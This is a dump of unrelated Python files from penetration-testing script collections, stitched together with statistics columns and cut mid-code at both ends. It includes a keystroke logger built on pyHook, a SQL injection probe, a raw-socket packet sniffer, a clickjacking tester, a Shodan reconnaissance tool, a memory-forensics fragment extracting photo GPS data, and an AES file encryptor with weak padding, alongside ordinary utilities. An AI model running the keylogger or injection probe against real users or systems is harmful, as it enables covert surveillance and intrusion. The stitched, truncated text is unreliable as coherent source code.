image_path = reference_clazz.getJValuebyName(entry, "referent").Object.dereference_as('Object')
image_weak_reference = image_path.clazz.getJValuebyName(image_path, "mObject").Object.dereference_as('Object')
# finally this is the instance of one picture class
local_image = reference_clazz.getJValuebyName(image_weak_reference, "referent").Object.dereference_as('Object')
# the interesting information is found in the superclass
local_media_item = local_image.clazz.super.dereference_as('ClassObject')
# get picture information
image_name = local_media_item.getJValuebyName(local_image, "caption").Object.dereference_as('Object')
image_size = local_media_item.getJValuebyName(local_image, "fileSize").int
image_lat = local_media_item.getJValuebyName(local_image, "latitude").longlong
image_long = local_media_item.getJValuebyName(local_image, "longitude").longlong
image_date_taken = local_media_item.getJValuebyName(local_image, "dateTakenInMs").ulonglong
image_filepath = local_media_item.getJValuebyName(local_image, "filePath").Object.dereference_as('Object')
image_width = local_media_item.getJValuebyName(local_image, "width").int
image_heigth = local_media_item.getJValuebyName(local_image, "height").int
yield inst, image_name, album_name, image_size, image_lat, image_long, image_date_taken, image_width, image_heigth
###################################################################################################
def render_text(self, outfd, data):
self.table_header(outfd, [ ("Instance", "10"),
("Name", "20"),
("Album", "10"),
("Size (kb)", "9"),
("Width", "5"),
("Heigth", "6"),
("Date taken", "19"),
("GPS Lat", "13"),
("GPS Long", "13")
])
for inst, image_name, album_name, image_size, image_lat, image_long, image_date_taken, image_width, image_heigth in data:
# get strings from java string class
img_name = dalvik.parseJavaLangString(image_name)
a_name = dalvik.parseJavaLangString(album_name)
# convert picture size from bytes to kilobytes
size = image_size / 1024
# convert epoch time to human readable date and time
rawDate = image_date_taken / 1000
date = str(time.gmtime(rawDate).tm_mday) + "." + \
str(time.gmtime(rawDate).tm_mon) + "." + \
str(time.gmtime(rawDate).tm_year) + " " + \
str(time.gmtime(rawDate).tm_hour) + ":" + \
str(time.gmtime(rawDate).tm_min) + ":" + \
str(time.gmtime(rawDate).tm_sec)
# convert gps coordinates to double values
lat = pack('q', image_lat)
lat = unpack('d', lat)
lon = pack('q', image_long)
lon = unpack('d', lon)
self.table_row( outfd,
hex(inst.obj_offset),
img_name,
a_name,
size,
image_width,
image_heigth,
date,
lat,
lon)
| 54.111111 | 141 | 0.532654 |
Effective-Python-Penetration-Testing | from Crypto.Cipher import AES
import os, random, struct
def encrypt_file(key, filename, chunk_size=64*1024):
output_filename = filename + '.encrypted'
iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16)) # Initialization vector
encryptor = AES.new(key, AES.MODE_CBC, iv)
filesize = os.path.getsize(filename)
with open(filename, 'rb') as inputfile:
with open(output_filename, 'wb') as outputfile:
outputfile.write(struct.pack('<Q', filesize))
outputfile.write(iv)
while True:
chunk = inputfile.read(chunk_size)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += ' ' * (16 - len(chunk) % 16)
outputfile.write(encryptor.encrypt(chunk))
encrypt_file('abcdefghji123456', 'sample-file.txt'); | 31.666667 | 89 | 0.580023 |
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Project'
db.create_table(u'xtreme_server_project', (
('project_name', self.gf('django.db.models.fields.CharField')(max_length=50, primary_key=True)),
('start_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('query_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('status', self.gf('django.db.models.fields.CharField')(default='Not Set', max_length=50)),
('login_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('logout_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('username_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('password_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('auth_mode', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['Project'])
# Adding model 'Page'
db.create_table(u'xtreme_server_page', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('URL', self.gf('django.db.models.fields.URLField')(max_length=200)),
('content', self.gf('django.db.models.fields.TextField')(blank=True)),
('visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('status_code', self.gf('django.db.models.fields.CharField')(max_length=256, blank=True)),
('connection_details', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page_found_on', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Page'])
# Adding model 'Form'
db.create_table(u'xtreme_server_form', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('form_found_on', self.gf('django.db.models.fields.URLField')(max_length=200)),
('form_name', self.gf('django.db.models.fields.CharField')(max_length=512, blank=True)),
('form_method', self.gf('django.db.models.fields.CharField')(default='GET', max_length=10)),
('form_action', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
('form_content', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('input_field_list', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Form'])
# Adding model 'InputField'
db.create_table(u'xtreme_server_inputfield', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('input_type', self.gf('django.db.models.fields.CharField')(default='input', max_length=256, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['InputField'])
# Adding model 'Vulnerability'
db.create_table(u'xtreme_server_vulnerability', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('details', self.gf('django.db.models.fields.TextField')(blank=True)),
('url', self.gf('django.db.models.fields.TextField')(blank=True)),
('re_attack', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.TextField')(blank=True)),
('timestamp', self.gf('django.db.models.fields.TextField')(blank=True)),
('msg_type', self.gf('django.db.models.fields.TextField')(blank=True)),
('msg', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Vulnerability'])
# Adding model 'Settings'
db.create_table(u'xtreme_server_settings', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('auth_mode', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['Settings'])
# Adding model 'LearntModel'
db.create_table(u'xtreme_server_learntmodel', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Page'])),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('query_id', self.gf('django.db.models.fields.TextField')()),
('learnt_model', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['LearntModel'])
def backwards(self, orm):
# Deleting model 'Project'
db.delete_table(u'xtreme_server_project')
# Deleting model 'Page'
db.delete_table(u'xtreme_server_page')
# Deleting model 'Form'
db.delete_table(u'xtreme_server_form')
# Deleting model 'InputField'
db.delete_table(u'xtreme_server_inputfield')
# Deleting model 'Vulnerability'
db.delete_table(u'xtreme_server_vulnerability')
# Deleting model 'Settings'
db.delete_table(u'xtreme_server_settings')
# Deleting model 'LearntModel'
db.delete_table(u'xtreme_server_learntmodel')
models = {
u'xtreme_server.form': {
'Meta': {'object_name': 'Form'},
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
},
u'xtreme_server.inputfield': {
'Meta': {'object_name': 'InputField'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
},
u'xtreme_server.learntmodel': {
'Meta': {'object_name': 'LearntModel'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'query_id': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.page': {
'Meta': {'object_name': 'Page'},
'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'xtreme_server.project': {
'Meta': {'object_name': 'Project'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.TextField', [], {}),
'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
'username': ('django.db.models.fields.TextField', [], {}),
'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
},
u'xtreme_server.settings': {
'Meta': {'object_name': 'Settings'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.TextField', [], {}),
'username': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.vulnerability': {
'Meta': {'object_name': 'Vulnerability'},
'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['xtreme_server'] | 63.71028 | 130 | 0.570521 |
PenTestScripts | #!/usr/bin/env python
# Script for interacting with Shodan's API and searching it.
# In case you get an import error for netaddr or shodan, run:
# apt-get install python-shodan python-netaddr
import argparse
from netaddr import IPNetwork
import os
import re
import shodan
import sys
def cli_parser():
# Command line argument parser
parser = argparse.ArgumentParser(
add_help=False,
description="ShodanSearch is a tool for searching shodan via its API.")
parser.add_argument(
"-search", metavar="Apache server", default=False,
help="Use this when searching Shodan for a string.")
parser.add_argument(
"-f", metavar="ips.txt", default=None,
help="File containing IPs to search shodan for.")
parser.add_argument(
"-ip", metavar='192.168.1.1', default=False,
help="Used to return results from Shodan about a specific IP.")
parser.add_argument(
"-cidr", metavar='192.168.1.0/24', default=False,
help="Used to return results from Shodan about a specific CIDR range.")
parser.add_argument(
"--hostnameonly", action='store_true',
help="[Optional] Only provide results with a Shodan stored hostname.")
parser.add_argument(
"--page", metavar='1', default=1,
help="Page number of results to return (default 1 (first page)).")
parser.add_argument(
'-h', '-?', '--h', '-help', '--help', action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
if args.h:
parser.print_help()
sys.exit()
return args.search, args.ip, args.cidr, args.hostnameonly, args.page, args.f
def create_shodan_object():
# Add your shodan API key here
api_key = "TYPEAPIKEYHERE"
shodan_object = shodan.WebAPI(api_key)
return shodan_object
def shodan_cidr_search(shodan_search_object, shodan_search_cidr, input_file_ips):
title()
if shodan_search_cidr is not False:
if not validate_cidr(shodan_search_cidr):
print "[*] ERROR: Please provide valid CIDR notation!"
sys.exit()
else:
print "[*] Searching Shodan for info about " + shodan_search_cidr
# Create cidr notated list
network = IPNetwork(shodan_search_cidr)
elif input_file_ips is not False:
try:
with open(input_file_ips, 'r') as ips_provided:
network = ips_provided.readlines()
except IOError:
print "[*] ERROR: You didn't provide a valid input file."
print "[*] ERROR: Please re-run and provide a valid file."
sys.exit()
# search shodan for each IP
for ip in network:
print "\n[*] Searching specifically for: " + str(ip)
try:
# Search Shodan
result = shodan_search_object.host(ip)
# Display basic info of result
print "\n*** RESULT ***"
print "IP: " + result['ip']
print "Country: " + result['country_name']
if result['city'] is not None:
print "City: " + result['city']
print "\n"
# Loop through other info
for item in result['data']:
print "Port: " + str(item['port'])
print "Banner: " + item['banner']
except Exception, e:
if str(e).strip() == "API access denied":
print "You provided an invalid API Key!"
print "Please provide a valid API Key and re-run!"
sys.exit()
elif str(e).strip() == "No information available for that IP.":
print "No information is available for " + str(ip)
else:
print "[*]Unknown Error: " + str(e)
def shodan_ip_search(shodan_search_object, shodan_search_ip):
title()
if validate_ip(shodan_search_ip):
print "[*] Searching Shodan for info about " + shodan_search_ip + "..."
try:
# Search Shodan
result = shodan_search_object.host(shodan_search_ip)
# Display basic info of result
print "\n*** RESULT ***"
print "IP: " + result['ip']
print "Country: " + result['country_name']
if result['city'] is not None:
print "City: " + result['city']
print "\n"
# Loop through other info
for item in result['data']:
print "Port: " + str(item['port'])
print "Banner: " + item['banner']
except Exception, e:
if str(e).strip() == "API access denied":
print "You provided an invalid API Key!"
print "Please provide a valid API Key and re-run!"
sys.exit()
elif str(e).strip() == "No information available for that IP.":
print "No information on Shodan about " +\
str(shodan_search_ip)
else:
print "[*]Unknown Error: " + str(e)
else:
print "[*]ERROR: You provided an invalid IP address!"
print "[*]ERROR: Please re-run and provide a valid IP."
sys.exit()
def shodan_string_search(shodan_search_object, shodan_search_string,
hostname_only, page_to_return):
title()
# Try/catch for searching the shodan api
print "[*] Searching Shodan...\n"
try:
# Time to search Shodan
results = shodan_search_object.search(
shodan_search_string, page=page_to_return)
if not hostname_only:
print "Total number of results back: " +\
str(results['total']) + "\n"
for result in results['matches']:
if hostname_only:
for item in result['hostnames']:
if item is None:
pass
else:
print "*** RESULT ***"
print "IP Address: " + result['ip']
if result['country_name'] is not None:
print "Country: " + result['country_name']
if result['updated'] is not None:
print "Last updated: " + result['updated']
if result['port'] is not None:
print "Port: " + str(result['port'])
print "Data: " + result['data']
for item in result['hostnames']:
print "Hostname: " + item
print
else:
print "*** RESULT ***"
print "IP Address: " + result['ip']
if result['country_name'] is not None:
print "Country: " + result['country_name']
if result['updated'] is not None:
print "Last updated: " + result['updated']
if result['port'] is not None:
print "Port: " + str(result['port'])
print "Data: " + result['data']
for item in result['hostnames']:
print "Hostname: " + item
print
except Exception, e:
if str(e).strip() == "API access denied":
print "You provided an invalid API Key!"
print "Please provide a valid API Key and re-run!"
sys.exit()
def title():
os.system('clear')
print "##################################################################"
print "# Shodan Search #"
print "##################################################################\n"
return
def validate_cidr(val_cidr):
# This came from (Mult-line link for pep8 compliance)
# http://python-iptools.googlecode.com/svn-history/r4
# /trunk/iptools/__init__.py
cidr_re = re.compile(r'^(\d{1,3}\.){0,3}\d{1,3}/\d{1,2}$')
if cidr_re.match(val_cidr):
ip, mask = val_cidr.split('/')
if validate_ip(ip):
if int(mask) > 32:
return False
else:
return False
return True
return False
def validate_ip(val_ip):
# This came from (Mult-line link for pep8 compliance)
# http://python-iptools.googlecode.com/svn-history/r4
# /trunk/iptools/__init__.py
ip_re = re.compile(r'^(\d{1,3}\.){0,3}\d{1,3}$')
if ip_re.match(val_ip):
quads = (int(q) for q in val_ip.split('.'))
for q in quads:
if q > 255:
return False
return True
return False
if __name__ == '__main__':
# Parse command line options
search_string, search_ip, search_cidr, search_hostnameonly,\
search_page_number, search_file = cli_parser()
# Create object used to search Shodan
shodan_api_object = create_shodan_object()
# Determine which action will be performed
if search_string is not False:
shodan_string_search(shodan_api_object, search_string,
search_hostnameonly, search_page_number)
elif search_ip is not False:
shodan_ip_search(shodan_api_object, search_ip)
elif search_cidr is not False or search_file is not None:
shodan_cidr_search(shodan_api_object, search_cidr, search_file)
else:
print "You didn't provide a valid option!"
| 32.741935 | 81 | 0.528843 |
cybersecurity-penetration-testing | # This program proves that the keyspace of the affine cipher is limited
# to len(SYMBOLS) ^ 2.
import affineCipher, cryptomath
message = 'Make things as simple as possible, but not simpler.'
for keyA in range(2, 100):
key = keyA * len(affineCipher.SYMBOLS) + 1
if cryptomath.gcd(keyA, len(affineCipher.SYMBOLS)) == 1:
print(keyA, affineCipher.encryptMessage(key, message)) | 35.545455 | 72 | 0.703242 |
owtf | """
PASSIVE Plugin for Testing: WS Information Gathering (OWASP-WS-001)
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Google Hacking/Third party sites for Web Services"
def run(PluginInfo):
resource = get_resources("WSPassiveSearchEngineDiscoveryLnk")
return plugin_helper.resource_linklist("Online Resources", resource)
| 29.769231 | 72 | 0.786967 |
cybersecurity-penetration-testing | import requests
from ghost import Ghost
import logging
import os
#<iframe src="http://usabledesigns.com/demo/iframe-test"></iframe>
URL = 'http://usabledesigns.com/demo/iframe-test'
URL = 'https://support.realvnc.com'
URL = 'https://evaluation.realvnc.com'
#def clickjack(URL):
req = requests.get(URL)
try:
xframe = req.headers['x-frame-options']
print 'X-FRAME-OPTIONS:', xframe , 'present, clickjacking not likely possible'
except:
print 'X-FRAME-OPTIONS missing'
print 'Attempting clickjacking...'
#clickjack(URL)
html = '''
<html>
<body>
<iframe src="'''+URL+'''" height='600px' width='800px'></iframe>
</body>
</html>'''
html_filename = 'clickjack.html'
log_filename = 'test.log'
f = open(html_filename, 'w+')
f.write(html)
f.close()
fh = logging.FileHandler(log_filename)
ghost = Ghost(log_level=logging.INFO, log_handler=fh)
page, resources = ghost.open(html_filename)
l = open(log_filename, 'r')
if 'forbidden by X-Frame-Options.' in l.read():
print 'Clickjacking mitigated via X-FRAME-OPTIONS'
else:
href = ghost.evaluate('document.location.href')[0]
if html_filename not in href:
print 'Frame busting detected'
else:
print 'Frame busting not detected, page is likely vulnerable to clickjacking'
l.close()
logging.getLogger('ghost').handlers[0].close()
os.unlink(log_filename)
os.unlink(html_filename) | 23.517857 | 85 | 0.699708 |
Python-Penetration-Testing-for-Developers | import socket
import struct
import binascii
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
while True:
pkt = s.recvfrom(2048)
banner = pkt[0][54:533]
print banner
print "--"*40
| 16.833333 | 74 | 0.71831 |
cybersecurity-penetration-testing | from os import readlink,lstat
import stat
path = '/etc/rc5.d/S99rc.local'
stat_info = lstat(path)
if stat.S_ISREG(stat_info.st_mode):
print 'File type: regular file'
if stat.S_ISDIR(stat_info.st_mode):
print 'File type: directory'
if stat.S_ISLNK(stat_info.st_mode):
print 'File type: symbolic link pointing to ',
print readlink(path)
| 18.105263 | 50 | 0.687845 |
PenetrationTestingScripts | "0.2.5"
__version__ = (0, 2, 5, None, None)
| 14 | 35 | 0.477273 |
owtf | """
Plugin for probing snmp
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = " SNMP Probing "
def run(PluginInfo):
resource = get_resources("SnmpProbeMethods")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 23.615385 | 88 | 0.746082 |
cybersecurity-penetration-testing | import pythoncom,pyHook
def OnKeyboardEvent(event):
"""
Process keyboard event
"""
if event.Ascii != 0 or event.Ascii != 8: # Skip Null & Backspace
if event.Ascii == 13: # Handles a 'Enter' key press
keylogs = '<return>'
else:
keylogs = chr(event.Ascii)
print keylogs,
# Create a hook manager object
hm=pyHook.HookManager()
try:
# Set funciton for keystroke processing
hm.KeyDown = OnKeyboardEvent
except (TypeError, KeyboardInterrupt):
pass # Allow us to ignore errors that may cause the code exit
# Set the hook
hm.HookKeyboard()
# Wait forever
pythoncom.PumpMessages()
| 24.192308 | 69 | 0.657492 |
cybersecurity-penetration-testing | import urllib2
GOOGLE_API_KEY = "{Insert your Google API key}"
target = "packtpub.com"
api_response = urllib2.urlopen("https://www.googleapis.com/plus/v1/people?query="+target+"&key="+GOOGLE_API_KEY).read()
api_response = api_response.split("\n")
for line in api_response:
if "displayName" in line:
print line | 35.888889 | 120 | 0.688822 |
cybersecurity-penetration-testing | import requests
url = "http://127.0.0.1/SQL/sqli-labs-master/Less-1/index.php?id="
initial = "'"
print "Testing "+ url
first = requests.post(url+initial)
if "mysql" in first.text.lower():
print "Injectable MySQL detected"
elif "native client" in first.text.lower():
print "Injectable MSSQL detected"
elif "syntax error" in first.text.lower():
print "Injectable PostGRES detected"
elif "ORA" in first.text.lower():
print "Injectable Oracle detected"
else:
print "Not Injectable :( " | 27.823529 | 66 | 0.725971 |
owtf | """
owtf.utils.http
~~~~~~~~~~~~~~~
"""
import collections
import types
try: # PY3
from urllib.parse import urlparse
except ImportError: # PY2
from urlparse import urlparse
def derive_http_method(method, data):
"""Derives the HTTP method from Data, etc
:param method: Method to check
:type method: `str`
:param data: Data to check
:type data: `str`
:return: Method found
:rtype: `str`
"""
d_method = method
# Method not provided: Determine method from params
if d_method is None or d_method == "":
d_method = "GET"
if data != "" and data is not None:
d_method = "POST"
return d_method
def deep_update(source, overrides):
"""Update a nested dictionary or similar mapping.
Modify ``source`` in place.
:type source: collections.Mapping
:type overrides: collections.Mapping
:rtype: collections.Mapping
"""
for key, value in overrides.items():
if isinstance(value, collections.Mapping) and value:
returned = deep_update(source.get(key, {}), value)
source[key] = returned
else:
source[key] = overrides[key]
return source
def extract_method(wrapped_method):
"""Gets original method if wrapped_method was decorated
:rtype: any([types.FunctionType, types.MethodType])
"""
# If method was decorated with validate, the original method
# is available as orig_func thanks to our container decorator
return wrapped_method.orig_func if hasattr(wrapped_method, "orig_func") else wrapped_method
def is_method(method):
method = extract_method(method)
# Can be either a method or a function
return type(method) in [types.MethodType, types.FunctionType]
| 25.621212 | 95 | 0.65205 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "XtremeWebAPP.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| 22.272727 | 76 | 0.713725 |
Python-Penetration-Testing-for-Developers | import socket
host = "192.168.0.1"
port = 12345
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host,port))
s.listen(2)
while True:
conn, addr = s.accept()
print addr, "Now Connected"
conn.send("Thank you for connecting")
conn.close()
| 20.25 | 53 | 0.700787 |
PenetrationTestingScripts | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
# from winbase.h
STDOUT = -11
STDERR = -12
try:
import ctypes
from ctypes import LibraryLoader
windll = LibraryLoader(ctypes.WinDLL)
from ctypes import wintypes
except (AttributeError, ImportError):
windll = None
SetConsoleTextAttribute = lambda *_: None
winapi_test = lambda *_: None
else:
from ctypes import byref, Structure, c_char, POINTER
COORD = wintypes._COORD
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
"""struct in wincon.h."""
_fields_ = [
("dwSize", COORD),
("dwCursorPosition", COORD),
("wAttributes", wintypes.WORD),
("srWindow", wintypes.SMALL_RECT),
("dwMaximumWindowSize", COORD),
]
def __str__(self):
return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % (
self.dwSize.Y, self.dwSize.X
, self.dwCursorPosition.Y, self.dwCursorPosition.X
, self.wAttributes
, self.srWindow.Top, self.srWindow.Left, self.srWindow.Bottom, self.srWindow.Right
, self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X
)
_GetStdHandle = windll.kernel32.GetStdHandle
_GetStdHandle.argtypes = [
wintypes.DWORD,
]
_GetStdHandle.restype = wintypes.HANDLE
_GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo
_GetConsoleScreenBufferInfo.argtypes = [
wintypes.HANDLE,
POINTER(CONSOLE_SCREEN_BUFFER_INFO),
]
_GetConsoleScreenBufferInfo.restype = wintypes.BOOL
_SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute
_SetConsoleTextAttribute.argtypes = [
wintypes.HANDLE,
wintypes.WORD,
]
_SetConsoleTextAttribute.restype = wintypes.BOOL
_SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition
_SetConsoleCursorPosition.argtypes = [
wintypes.HANDLE,
COORD,
]
_SetConsoleCursorPosition.restype = wintypes.BOOL
_FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA
_FillConsoleOutputCharacterA.argtypes = [
wintypes.HANDLE,
c_char,
wintypes.DWORD,
COORD,
POINTER(wintypes.DWORD),
]
_FillConsoleOutputCharacterA.restype = wintypes.BOOL
_FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute
_FillConsoleOutputAttribute.argtypes = [
wintypes.HANDLE,
wintypes.WORD,
wintypes.DWORD,
COORD,
POINTER(wintypes.DWORD),
]
_FillConsoleOutputAttribute.restype = wintypes.BOOL
_SetConsoleTitleW = windll.kernel32.SetConsoleTitleA
_SetConsoleTitleW.argtypes = [
wintypes.LPCSTR
]
_SetConsoleTitleW.restype = wintypes.BOOL
handles = {
STDOUT: _GetStdHandle(STDOUT),
STDERR: _GetStdHandle(STDERR),
}
def winapi_test():
handle = handles[STDOUT]
csbi = CONSOLE_SCREEN_BUFFER_INFO()
success = _GetConsoleScreenBufferInfo(
handle, byref(csbi))
return bool(success)
def GetConsoleScreenBufferInfo(stream_id=STDOUT):
handle = handles[stream_id]
csbi = CONSOLE_SCREEN_BUFFER_INFO()
success = _GetConsoleScreenBufferInfo(
handle, byref(csbi))
return csbi
def SetConsoleTextAttribute(stream_id, attrs):
handle = handles[stream_id]
return _SetConsoleTextAttribute(handle, attrs)
def SetConsoleCursorPosition(stream_id, position, adjust=True):
position = COORD(*position)
# If the position is out of range, do nothing.
if position.Y <= 0 or position.X <= 0:
return
# Adjust for Windows' SetConsoleCursorPosition:
# 1. being 0-based, while ANSI is 1-based.
# 2. expecting (x,y), while ANSI uses (y,x).
adjusted_position = COORD(position.Y - 1, position.X - 1)
if adjust:
# Adjust for viewport's scroll position
sr = GetConsoleScreenBufferInfo(STDOUT).srWindow
adjusted_position.Y += sr.Top
adjusted_position.X += sr.Left
# Resume normal processing
handle = handles[stream_id]
return _SetConsoleCursorPosition(handle, adjusted_position)
def FillConsoleOutputCharacter(stream_id, char, length, start):
handle = handles[stream_id]
char = c_char(char.encode())
length = wintypes.DWORD(length)
num_written = wintypes.DWORD(0)
# Note that this is hard-coded for ANSI (vs wide) bytes.
success = _FillConsoleOutputCharacterA(
handle, char, length, start, byref(num_written))
return num_written.value
def FillConsoleOutputAttribute(stream_id, attr, length, start):
